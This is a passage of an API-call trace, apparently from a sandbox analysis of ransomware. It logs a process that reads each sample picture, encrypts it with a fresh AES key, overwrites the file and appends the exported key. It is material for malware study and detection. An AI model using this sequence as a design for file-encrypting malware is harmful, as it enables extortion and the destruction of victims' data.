flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.430] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.430] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd6b22, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xd6b22, lpOverlapped=0x0) returned 1 [0160.454] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.454] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd6b22, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xd6b30) returned 1 [0160.459] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.459] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd6b30, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xd6b30, lpOverlapped=0x0) returned 1 [0160.461] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.461] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.461] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.461] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.461] CloseHandle (hObject=0x18c) returned 1 [0160.464] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.468] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.468] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.468] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.468] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.468] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", dwFileAttributes=0x80) returned 1 [0160.469] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.469] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=845941) returned 1 [0160.469] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=845941) returned 1 [0160.469] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xce753, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.469] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.470] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.470] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.470] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.470] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.470] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xce875, lpOverlapped=0x0) returned 1 [0160.488] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.488] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xce875, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xce880) returned 1 [0160.492] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.492] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xce880, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xce880, lpOverlapped=0x0) returned 1 [0160.494] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.494] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.494] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.494] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.495] CloseHandle (hObject=0x18c) returned 1 [0160.497] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.501] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.501] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.501] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.501] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.502] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", dwFileAttributes=0x80) returned 1 [0160.503] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.503] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=595284) returned 1 [0160.503] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=595284) returned 1 [0160.503] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x91432, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.503] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.505] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.505] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.505] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.505] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.505] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x91554, lpOverlapped=0x0) returned 1 [0160.515] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.515] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x91554, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x91560) returned 1 [0160.518] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.519] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x91560, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x91560, lpOverlapped=0x0) returned 1 [0160.520] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.520] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.520] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.520] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.520] CloseHandle (hObject=0x18c) returned 1 [0160.527] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.531] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.531] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.531] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.531] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", dwFileAttributes=0x80) returned 1 [0160.532] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.532] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=775702) returned 1 [0160.532] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=775702) returned 1 [0160.532] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xbd4f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.532] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.534] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.534] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.534] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.534] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.534] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xbd616, lpOverlapped=0x0) returned 1 [0160.549] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.549] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbd616, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbd620) returned 1 [0160.553] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.553] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbd620, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xbd620, lpOverlapped=0x0) returned 1 [0160.555] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.555] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.555] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.555] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.555] CloseHandle (hObject=0x18c) returned 1 [0160.559] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.563] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.563] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.563] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.564] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", dwFileAttributes=0x80) returned 1 [0160.564] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.564] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=780831) returned 1 [0160.564] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=780831) returned 1 [0160.564] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xbe8fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.564] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.568] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.568] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.568] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.568] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.568] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbea1f, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xbea1f, lpOverlapped=0x0) returned 1 [0160.581] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.581] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbea1f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbea20) returned 1 [0160.585] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.585] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbea20, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xbea20, lpOverlapped=0x0) returned 1 [0160.587] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.587] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.587] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.588] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.588] CloseHandle (hObject=0x18c) returned 1 [0160.601] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.605] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.605] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.605] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.605] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", dwFileAttributes=0x80) returned 1 [0160.606] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.606] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=561276) returned 1 [0160.606] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=561276) returned 1 [0160.606] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x88f5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.606] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.607] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.607] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.607] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.608] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.608] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8907c, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x8907c, lpOverlapped=0x0) returned 1 [0160.618] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.618] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x8907c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x89080) returned 1 [0160.621] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.621] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x89080, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x89080, lpOverlapped=0x0) returned 1 [0160.623] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.623] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.623] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.623] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.623] CloseHandle (hObject=0x18c) returned 1 [0160.630] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.634] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.634] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.635] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.635] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", dwFileAttributes=0x80) returned 1 [0160.635] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.635] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=777835) returned 1 [0160.635] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=777835) returned 1 [0160.635] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xbdd49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.636] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.637] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.637] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.637] VirtualAlloc 